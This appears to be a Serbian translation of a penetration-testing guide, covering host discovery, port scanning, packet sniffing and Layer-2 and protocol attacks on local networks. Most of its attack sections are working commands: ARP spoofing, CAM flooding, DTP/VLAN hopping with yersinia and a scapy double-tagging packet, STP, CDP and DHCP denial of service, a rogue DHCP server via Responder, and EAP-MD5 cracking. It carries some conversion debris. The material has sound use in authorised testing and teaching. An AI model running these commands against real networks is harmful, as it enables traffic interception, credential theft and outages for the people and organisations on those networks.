Register - IntigritiRegister - Intigriti

Otkrivanje hostova sa spoljne strane

Ovo će biti kratka sekcija o tome kako pronaći IP adrese koje odgovaraju sa Interneta. U ovoj situaciji imate neki opseg IP adresa (možda čak i nekoliko opsega) i samo treba da pronađete koje IP adrese odgovaraju.

ICMP

Ovo je najlakši i najbrži način da otkrijete da li je host dostupan ili ne. Možete pokušati da pošaljete neke ICMP pakete i očekujete odgovore. Najlakši način je jednostavno slanje echo zahteva i očekivanje odgovora. To možete uraditi koristeći jednostavnu ping komandu ili koristeći fping za opsege. Takođe možete koristiti nmap da pošaljete druge vrste ICMP paketa (ovo će izbeći filtere za uobičajeni ICMP echo zahtev-odgovor).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

Otkriće TCP porta

Veoma je uobičajeno da su svi tipovi ICMP paketa filtrirani. Zatim, sve što možete uraditi da proverite da li je host dostupan je pokušati pronaći otvorene portove. Svaki host ima 65535 portova, tako da, ako imate "veliki" opseg, ne možete testirati da li je svaki port svakog hosta otvoren ili ne, to bi oduzelo previše vremena. Zatim, ono što vam je potrebno je brzi skener portova (masscan) i lista najčešće korišćenih portova:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

Otkrivanje HTTP porta

Ovo je samo otkrivanje TCP porta korisno kada želite da se usredsredite na otkrivanje HTTP servisa:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

Otkrivanje UDP porta

Takođe možete pokušati da proverite da li je neki UDP port otvoren kako biste odlučili da li treba da posvetite više pažnje nekom hostu. Pošto UDP servisi obično ne odgovaraju sa bilo kakvim podacima na običan prazan UDP probni paket, teško je reći da li je port filtriran ili otvoren. Najlakši način da se ovo utvrdi je slanje paketa koji je povezan sa pokrenutim servisom, a pošto ne znate koji servis je pokrenut, trebalo bi da probate najverovatniji na osnovu broja porta:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Linija nmap-a koja je predložena ranije testiraće top 1000 UDP portova na svakom hostu unutar /24 opsega, ali čak i to će trajati >20min. Ako su vam potrebni najbrži rezultati, možete koristiti udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Ovo će poslati ove UDP probe na njihove očekivane portove (za /24 opseg će trajati samo 1 minut): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

Otkrivanje SCTP portova

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Testiranje bezbednosti Wifi mreže

Ovde možete pronaći koristan vodič sa svim poznatim napadima na Wifi mreže u vreme pisanja:

Otkrivanje računara unutar mreže

Ako se nalazite unutar mreže, jedna od prvih stvari koje ćete želeti da uradite jeste otkrivanje drugih računara. Zavisno od koliko buke možete/želite da napravite, mogu se izvršiti različite radnje:

Pasivno

Možete koristiti ove alate za pasivno otkrivanje računara unutar povezane mreže:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Aktivno

Imajte na umu da se tehnike komentarisane u Otkrivanje domaćina spolja (TCP/HTTP/UDP/SCTP Otkrivanje portova) takođe mogu primeniti ovde. Međutim, pošto ste u istoj mreži kao i drugi domaćini, možete uraditi više stvari:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Aktivni ICMP

Imajte na umu da se tehnike komentarisane u Otkrivanje hostova spolja (ICMP) takođe mogu primeniti ovde. Međutim, pošto ste u istoj mreži kao i drugi hostovi, možete uraditi više stvari:

• Ako pingujete subnet broadcast adresu, ping bi trebalo da stigne do svakog hosta i oni bi mogli da vam odgovore: ping -b 10.10.5.255

• Pingovanjem network broadcast adrese čak možete pronaći hostove unutar drugih subnetova: ping -b 255.255.255.255

• Koristite zastave -PE, -PP, -PM u nmap za obavljanje otkrivanja hostova slanjem odgovarajuće ICMPv4 echo, timestamp i subnet mask zahteva: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Budjenje preko LAN-a

Budjenje preko LAN-a se koristi za uključivanje računara putem mrežne poruke. Čarobni paket koji se koristi za uključivanje računara je samo paket u kojem je naveden MAC Dst i zatim se ponavlja 16 puta unutar istog paketa. Ovakve vrste paketa obično se šalju u ethernet 0x0842 ili u UDP paketu na port 9. Ako nije pružen [MAC], paket se šalje na broadcast ethernet (i broadcast MAC će biti onaj koji se ponavlja).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Skeniranje Hostova

Kada ste otkrili sve IP adrese (spoljne ili unutrašnje) koje želite detaljno skenirati, mogu se izvršiti različite radnje.

TCP

• Otvoren port: SYN --> SYN/ACK --> RST

• Zatvoren port: SYN --> RST/ACK

• Filtriran port: SYN --> [BEZ ODGOVORA]

• Filtriran port: SYN --> ICMP poruka

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

Postoje 2 opcije za skeniranje UDP porta:

• Pošaljite UDP paket i proverite odgovor ICMP nedostupno ako je port zatvoren (u nekim slučajevima ICMP će biti filtriran pa nećete dobiti informaciju da li je port zatvoren ili otvoren).

• Pošaljite formatirane datagrame da biste izazvali odgovor od servisa (npr. DNS, DHCP, TFTP i drugi, kao što je navedeno u nmap-payloads). Ako dobijete odgovor, onda je port otvoren.

Nmap će mešati obe opcije koristeći "-sV" (UDP skeniranja su veoma spora), ali imajte na umu da su UDP skeniranja sporija od TCP skeniranja:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP Skeniranje

SCTP (Protokol za kontrolu toka prenosa) dizajniran je da se koristi uz TCP (Protokol za kontrolu prenosa) i UDP (Protokol za korisničke datagrame). Njegova glavna svrha je olakšavanje prenosa telefonskih podataka preko IP mreža, oponašajući mnoge od karakteristika pouzdanosti koje se nalaze u Signalizacijskom sistemu 7 (SS7). SCTP je osnovna komponenta porodičnog protokola SIGTRAN, koji ima za cilj prenos SS7 signala preko IP mreža.

Podrška za SCTP pružena je različitim operativnim sistemima, poput IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS i VxWorks, što ukazuje na široko prihvatanje i korisnost u oblasti telekomunikacija i mrežnih veza.

Nmap nudi dva različita skeniranja za SCTP: -sY i -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

Ekvazija IDS i IPS

Više opcija za nmap

Otkrivanje internih IP adresa

Ponekad loše konfigurisani ruteri, firewall-i i mrežni uređaji odgovaraju na mrežne upite koristeći nejavne izvorne adrese. tcpdump se može koristiti za identifikaciju paketa primljenih sa privatnih adresa tokom testiranja. Konkretno, na Kali Linux-u, paketi mogu biti uhvaćeni na eth2 interfejsu, koji je dostupan sa javnog interneta. Važno je napomenuti da ako je vaša postavka iza NAT-a ili Firewall-a, takvi paketi verovatno će biti filtrirani.

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Snifing

Snifingom možete saznati detalje opsega IP adresa, veličine podmreža, MAC adrese i imena hostova pregledanjem uhvaćenih okvira i paketa. Ako je mreža loše konfigurisana ili je prekidački sloj pod stresom, napadači mogu uhvatiti osetljive materijale putem pasivnog snifinga mreže.

Ako je preklopljena Ethernet mreža pravilno konfigurisana, videćete samo emitovane okvire i materijal namenjen vašoj MAC adresi.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Može se, takođe, snimati pakete sa udaljene mašine preko SSH sesije sa Wireshark-om kao GUI-em u realnom vremenu.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Očigledno.

Snimanje pristupnih podataka

Možete koristiti alate poput https://github.com/lgandx/PCredz za parsiranje pristupnih podataka iz pcap datoteke ili sa živog interfejsa.

Napadi na LAN

ARP prevara

ARP prevara se sastoji od slanja lažnih ARP odgovora kako bi se naznačilo da IP adresa mašine ima MAC adresu našeg uređaja. Zatim, žrtva će promeniti ARP tabelu i kontaktiraće naš uređaj svaki put kada želi da kontaktira IP adresu koja je lažirana.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC poplava - preplavljivanje CAM tabele

Preplavite CAM tabelu prekidača slanjem velikog broja paketa sa različitim izvornim MAC adresama. Kada je CAM tabela puna, prekidač počinje da se ponaša kao hub (emitovanje saobraćaja).

macof -i <interface>

U modernim prekidačima ova ranjivost je ispravljena.

802.1Q VLAN / DTP Napadi

Dinamičko trunkovanje

Protokol dinamičkog trunkovanja (DTP) dizajniran je kao protokol sloja veze kako bi olakšao automatski sistem za trunkovanje, omogućavajući prekidačima automatski odabir portova za režim trunka (Trunk) ili režim non-trunka. Implementacija DTP često se smatra pokazateljem suboptimalnog dizajna mreže, ističući važnost ručnog konfigurisanja trunkova samo tamo gde je potrebno i osiguravanja odgovarajuće dokumentacije.

Prema podrazumevanim podešavanjima, portovi prekidača postavljeni su da rade u režimu Dinamički auto, što znači da su spremni da pokrenu trunkovanje ako ih podstakne susedni prekidač. Bezbednosna zabrinutost nastaje kada pentester ili napadač poveže sa prekidačem i pošalje DTP željeni okvir, prisiljavajući port da uđe u režim trunka. Ova akcija omogućava napadaču da nabraja VLAN-ove kroz analizu STP okvira i zaobilazi segmentaciju VLAN-ova postavljanjem virtuelnih interfejsa.

Prisustvo DTP-a u mnogim prekidačima podrazumevano može biti iskorišćeno od strane protivnika da imitira ponašanje prekidača, čime dobija pristup saobraćaju preko svih VLAN-ova. Skripta dtpscan.sh koristi se za praćenje interfejsa, otkrivajući da li je prekidač u podrazumevanom, trunk, dinamičkom, auto ili pristup režimu - poslednji je jedina konfiguracija imuna na napade VLAN hopping-a. Ovaj alat procenjuje status ranjivosti prekidača.

U slučaju identifikacije ranjivosti mreže, alat Yersinia može se koristiti za "omogućavanje trunkovanja" putem DTP protokola, omogućavajući posmatranje paketa sa svih VLAN-ova.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Za enumeraciju VLAN-ova takođe je moguće generisati DTP Desirable ram sa skriptom DTPHijacking.py. Nemojte prekidati skriptu pod bilo kojim okolnostima. Ona ubacuje DTP Desirable svakih tri sekunde. Dinamički kreirani trunk kanali na prekidaču žive samo pet minuta. Nakon pet minuta, trunk nestaje.

sudo python3 DTPHijacking.py --interface eth0

Želim da istaknem da Pristup/Poželjan (0x03) ukazuje da je DTP okvir tipa Poželjan, što govori portu da prebaci u Trunk režim. I 802.1Q/802.1Q (0xa5) označava tip enkapsulacije 802.1Q.

Analizom STP okvira, saznajemo o postojanju VLAN-a 30 i VLAN-a 60.

Napadi na specifične VLAN-ove

Kada saznate VLAN ID-ove i IP vrednosti, možete konfigurisati virtuelni interfejs da napadnete određeni VLAN. Ako DHCP nije dostupan, koristite ifconfig za postavljanje statičke IP adrese.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatski VLAN skakač

Razmatrani napad Dinamičko prebacivanje i kreiranje virtuelnih interfejsa za otkrivanje hostova unutar drugih VLAN-ova automatski se izvodi pomoću alata: https://github.com/nccgroup/vlan-hopping---frogger

Dvostruko označavanje

Ako napadač zna vrednost MAC adrese, IP adrese i VLAN ID-a žrtvenog hosta, može pokušati dvostruko označiti okvir sa svojim određenim VLAN-om i VLAN-om žrtve i poslati paket. Pošto žrtva neće moći da se poveže nazad sa napadačem, najbolja opcija za napadača je komunicirati putem UDP-a sa protokolima koji mogu izvršiti neke zanimljive akcije (kao što je SNMP).

Druga opcija za napadača je da pokrene TCP skeniranje porta lažirajući IP adresu kojom upravlja napadač i kojoj žrtva može pristupiti (verovatno preko interneta). Zatim, napadač može špijunirati drugi host koji mu pripada da vidi da li prima pakete od žrtve.

Da biste izveli ovaj napad, možete koristiti scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Bypassiranje Lateralne VLAN Segmentacije

Ako imate pristup prekidaču kojem ste direktno povezani, imate mogućnost da zaobiđete VLAN segmentaciju unutar mreže. Jednostavno prebacite port u režim trunke (trunk), kreirajte virtuelne interfejse sa ID-ovima ciljanih VLAN-ova, i konfigurišite IP adresu. Možete pokušati zatražiti adresu dinamički (DHCP) ili je konfigurisati statički. To zavisi od slučaja.

Bypassiranje Privatne VLAN na Nivou 3

U određenim okruženjima, kao što su gostujuće bežične mreže, postavke izolacije porta (poznate i kao privatne VLAN) se implementiraju kako bi se sprečilo da klijenti povezani sa bežičnom tačkom pristupa direktno komuniciraju jedni sa drugima. Međutim, identifikovana je tehnika koja može zaobići ove mere izolacije. Ova tehnika iskorišćava ili nedostatak ACL-ova u mreži ili njihovu nepravilnu konfiguraciju, omogućavajući IP paketima da budu rutirani preko rutera kako bi stigli do drugog klijenta na istoj mreži.

Napad se izvodi kreiranjem paketa koji nosi IP adresu odredišnog klijenta ali sa MAC adresom rutera. Ovo uzrokuje da ruter greškom prosledi paket ciljnom klijentu. Ovaj pristup je sličan onome koji se koristi u napadima sa dvostrukim označavanjem, gde se sposobnost kontrole nad hostom koji je dostupan žrtvi koristi za iskorišćavanje sigurnosne greške.

Ključni Koraci Napada:

1. Kreiranje Paketa: Paket je posebno kreiran da uključuje IP adresu ciljnog klijenta ali sa MAC adresom rutera.

2. Iskorišćavanje Ponašanja Rutera: Kreirani paket se šalje do rutera, koji, zbog konfiguracije, preusmerava paket ka ciljnom klijentu, zaobilazeći izolaciju koju pružaju postavke privatne VLAN.

Napadi VTP-a

VTP (VLAN Trunking Protocol) centralizuje upravljanje VLAN-ovima. Koristi revizijske brojeve za održavanje integriteta baze podataka VLAN-ova; svaka modifikacija povećava ovaj broj. Prekidači usvajaju konfiguracije sa većim revizijskim brojevima, ažurirajući svoje VLAN baze podataka.

Uloge Domena VTP-a

• VTP Server: Upravlja VLAN-ovima—kreira, briše, modifikuje. Emituje VTP obaveštenja članovima domena.

• VTP Klijent: Prima VTP obaveštenja radi sinhronizacije svoje VLAN baze podataka. Ova uloga je ograničena od lokalnih modifikacija konfiguracije VLAN-ova.

• VTP Transparent: Ne učestvuje u VTP ažuriranjima već prosleđuje VTP obaveštenja. Nezahvaćen VTP napadima, održava konstantan revizijski broj nula.

Tipovi Obaveštenja VTP-a

• Sažeto Obaveštenje: Emituje ga VTP server svakih 300 sekundi, noseći bitne informacije o domenu.

• Podskup Obaveštenja: Poslat nakon promena konfiguracije VLAN-ova.

• Zahtev za Obaveštenjem: Izdaje ga VTP klijent kako bi zatražio Sažeto Obaveštenje, obično kao odgovor na otkrivanje većeg revizijskog broja konfiguracije.

VTP ranjivosti su iskorišćive isključivo putem trunk portova jer se VTP obaveštenja kruže samo kroz njih. Scenariji napada nakon DTP-a mogu se preusmeriti ka VTP-u. Alati poput Yersinie mogu olakšati VTP napade, sa ciljem brisanja baze podataka VLAN-ova, efikasno remeteći mrežu.

Napomena: Ova diskusija se odnosi na VTP verziju 1 (VTPv1).

%% yersinia -G # Launch Yersinia in graphical mode ```

Napadi STP-a

Ako ne možete uhvatiti BPDU okvire na svojim interfejsima, malo je verovatno da ćete uspeti u napadu na STP.

STP BPDU DoS

Slanjem velikog broja BPDU okvira TCP (obaveštenje o promeni topologije) ili Conf (BPDU okviri koji se šalju prilikom kreiranja topologije) preopterećuju se prekidači i prestaju pravilno raditi.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Napad

Kada se TCP pošalje, CAM tabela prekidača će biti obrisana za 15s. Zatim, ako neprekidno šaljete ovu vrstu paketa, CAM tabela će se neprekidno restartovati (ili svakih 15 sekundi) i kada se restartuje, prekidač se ponaša kao hub.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

Napad na STP koren

Napadač simulira ponašanje prekidača kako bi postao STP koren mreže. Zatim će više podataka prolaziti kroz njega. Ovo je interesantno kada ste povezani sa dva različita prekidača. Ovo se postiže slanjem BPDUs CONF paketa koji govore da je vrednost prioriteta manja od stvarnog prioriteta stvarnog korenskog prekidača.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Ako napadač ima pristup 2 prekidača, može postati koren novog stabla i sav saobraćaj između tih prekidača će prolaziti kroz njega (izvršiće se napad čovek-u-sredini).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Napadi CDP-a

CISCO Discovery Protocol (CDP) je ključan za komunikaciju između CISCO uređaja, omogućavajući im da identifikuju jedan drugog i dele detalje konfiguracije.

Pasivno prikupljanje podataka

CDP je konfigurisan da emituje informacije kroz sve portove, što može predstavljati sigurnosni rizik. Napadač, nakon povezivanja na switch port, može implementirati mrežne snifere poput Wireshark, tcpdump, ili Yersinia. Ova akcija može otkriti osetljive podatke o mrežnom uređaju, uključujući njegov model i verziju Cisco IOS-a koji koristi. Napadač može zatim ciljati specifične ranjivosti u identifikovanoj verziji Cisco IOS-a.

Izazivanje preplavljivanja CDP tabele

Agresivniji pristup uključuje pokretanje napada Denial of Service (DoS) preplavljujući memoriju switch-a, praveći se da su legitimni CISCO uređaji. U nastavku je niz komandi za pokretanje takvog napada korišćenjem alata Yersinia, mrežnog alata dizajniranog za testiranje:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Tokom ovog napada, CPU prekidača i CDP tabela suseda su jako opterećeni, što dovodi do onoga što se često naziva "paraliza mreže" zbog prekomerne potrošnje resursa.

Napad na impersonaciju CDP-a

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Takođe možete koristiti scapy. Obavezno ga instalirajte sa paketom scapy/contrib.

Napadi na VoIP i alat VoIP Hopper

VoIP telefoni, sve više integrisani sa IoT uređajima, nude funkcionalnosti poput otključavanja vrata ili upravljanja termostatima putem posebnih telefonskih brojeva. Međutim, ova integracija može predstavljati sigurnosne rizike.

Alat voiphopper je dizajniran da emulira VoIP telefon u različitim okruženjima (Cisco, Avaya, Nortel, Alcatel-Lucent). Otkriva VLAN ID glasovne mreže koristeći protokole poput CDP, DHCP, LLDP-MED i 802.1Q ARP.

VoIP Hopper nudi tri moda za Cisco Discovery Protocol (CDP):

1. Režim Sniff (-c 0): Analizira mrežne pakete kako bi identifikovao VLAN ID.

2. Režim Spoof (-c 1): Generiše prilagođene pakete koji imitiraju pakete stvarnog VoIP uređaja.

3. Spoof sa Pre-made Packet Mode (-c 2): Šalje pakete identične onima određenog modela Cisco IP telefona.

Preferirani režim za brzinu je treći. Potrebno je specificirati:

• Mrežni interfejs napadača (parametar -i).

• Ime VoIP uređaja koji se emulira (parametar -E), pridržavajući se Cisco formata imenovanja (npr. SEP praćeno MAC adresom).

U korporativnim okruženjima, kako bi se imitirao postojeći VoIP uređaj, moglo bi se:

• Pregledati MAC oznaku na telefonu.

• Navigirati kroz postavke ekrana telefona kako bi se vidjele informacije o modelu.

• Povezati VoIP uređaj sa laptopom i posmatrati CDP zahteve korišćenjem alata Wireshark.

Primer komande za izvršavanje alata u trećem modu bio bi:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

Napadi DHCP

Nabrojavanje

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Protiv DHCP servera mogu se izvršiti dve vrste DoS napada. Prvi se sastoji od simuliranja dovoljno lažnih hostova kako bi se iskoristile sve moguće IP adrese. Ovaj napad će uspeti samo ako možete videti odgovore DHCP servera i završiti protokol (Otkrij (Računar) --> Ponudi (server) --> Zahtev (Računar) --> Potvrda (server)). Na primer, ovo nije moguće u Wifi mrežama.

Drugi način izvođenja DHCP DoS je slanje DHCP-RELEASE paketa koristeći kao izvorni kod svaku moguću IP adresu. Tada će server pomisliti da je svako završio sa korišćenjem IP adrese.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Način automatskog obavljanja ovoga je korišćenje alata DHCPing

Možete koristiti pomenute DoS napade da biste naterali klijente da dobiju nove zakupljene adrese unutar okruženja, i iscrpeli legitimne servere kako bi postali neodzivni. Tako kada legitimni pokušaju ponovno da se povežu, možete poslužiti zlonamerne vrednosti navedene u sledećem napadu.

Postavljanje zlonamernih vrednosti

Lažni DHCP server može biti postavljen korišćenjem DHCP skripte smeštene na /usr/share/responder/DHCP.py. Ovo je korisno za mrežne napade, poput hvatanja HTTP saobraćaja i akreditiva, preusmeravanjem saobraćaja ka zlonamernom serveru. Međutim, postavljanje lažne gateway-a je manje efikasno jer dozvoljava samo hvatanje odlaznog saobraćaja sa klijenta, propuštajući odgovore od pravog gateway-a. Umesto toga, postavljanje lažnog DNS ili WPAD servera se preporučuje za efikasniji napad.

Ispod su opcije komandi za konfigurisanje lažnog DHCP servera:

• Naša IP adresa (Oglašavanje gateway-a): Koristite -i 10.0.0.100 da oglašavate IP vašeg računara kao gateway.

• Lokalno DNS ime domena: Opciono, koristite -d example.org da postavite lokalno DNS ime domena.

• Originalni Router/Gateway IP: Koristite -r 10.0.0.1 da specificirate IP adresu legitimnog rutera ili gateway-a.

• Primarni DNS Server IP: Koristite -p 10.0.0.100 da postavite IP adresu lažnog DNS servera koji kontrolišete.

• Sekundarni DNS Server IP: Opciono, koristite -s 10.0.0.1 da postavite IP adresu sekundarnog DNS servera.

• Netmaska lokalne mreže: Koristite -n 255.255.255.0 da definišete netmasku za lokalnu mrežu.

• Interfejs za DHCP saobraćaj: Koristite -I eth1 da osluškujete DHCP saobraćaj na određenom mrežnom interfejsu.

• WPAD Konfiguraciona adresa: Koristite -w “http://10.0.0.100/wpad.dat” da postavite adresu za WPAD konfiguraciju, pomažući u presretanju web saobraćaja.

• Lažiranje IP adrese podrazumevanog gateway-a: Uključite -S da lažirate IP adresu podrazumevanog gateway-a.

• Odgovor na sve DHCP zahteve: Uključite -R da server odgovara na sve DHCP zahteve, ali budite svesni da je ovo bučno i može biti otkriveno.

Pravilnim korišćenjem ovih opcija, lažni DHCP server može biti uspostavljen da efikasno presretne mrežni saobraćaj.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Napadi

Evo nekih taktika napada koje se mogu koristiti protiv implementacija 802.1X:

• Aktivno grubo silovanje lozinke putem EAP-a

• Napad na RADIUS server sa neispravnim EAP sadržajem (eksploatacije)

• Snimanje EAP poruka i offline pucanje lozinke (EAP-MD5 i PEAP)

• Prisiljavanje EAP-MD5 autentikacije radi zaobilaženja provere TLS sertifikata

• Ubacivanje zlonamernog mrežnog saobraćaja prilikom autentikacije korišćenjem hub-a ili slično

Ako je napadač između žrtve i servera za autentikaciju, mogao bi pokušati da degradira (ako je potrebno) protokol autentikacije na EAP-MD5 i snimi pokušaj autentikacije. Zatim, mogao bi grubo silovati ovo korišćenjem:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

Napadi FHRP (GLBP & HSRP)

FHRP (First Hop Redundancy Protocol) je klasa mrežnih protokola dizajnirana da stvori redundantni sistem za rutiranje. Sa FHRP-om, fizički ruteri mogu biti kombinovani u jedan logički uređaj, što povećava otpornost na greške i pomaže u distribuciji opterećenja.

Inženjeri kompanije Cisco Systems su razvili dva FHRP protokola, GLBP i HSRP.

RIP

Postoje tri verzije Routing Information Protocol (RIP): RIP, RIPv2 i RIPng. Datagrami se šalju vršnjacima preko porta 520 korišćenjem UDP-a od strane RIP-a i RIPv2, dok se datagrami emituju na UDP port 521 putem IPv6 multicast-a od strane RIPng. Podrška za MD5 autentikaciju je uvedena od strane RIPv2. S druge strane, RIPng ne uključuje nativnu autentikaciju; umesto toga, oslanja se na opcione IPsec AH i ESP zaglavlja unutar IPv6.

• RIP i RIPv2: Komunikacija se vrši putem UDP datagrama na portu 520.

• RIPng: Koristi UDP port 521 za emitovanje datagrama putem IPv6 multicast-a.

Napomena: RIPv2 podržava MD5 autentikaciju dok RIPng ne uključuje nativnu autentikaciju, oslanjajući se na IPsec AH i ESP zaglavlja u IPv6.

Napadi na EIGRP

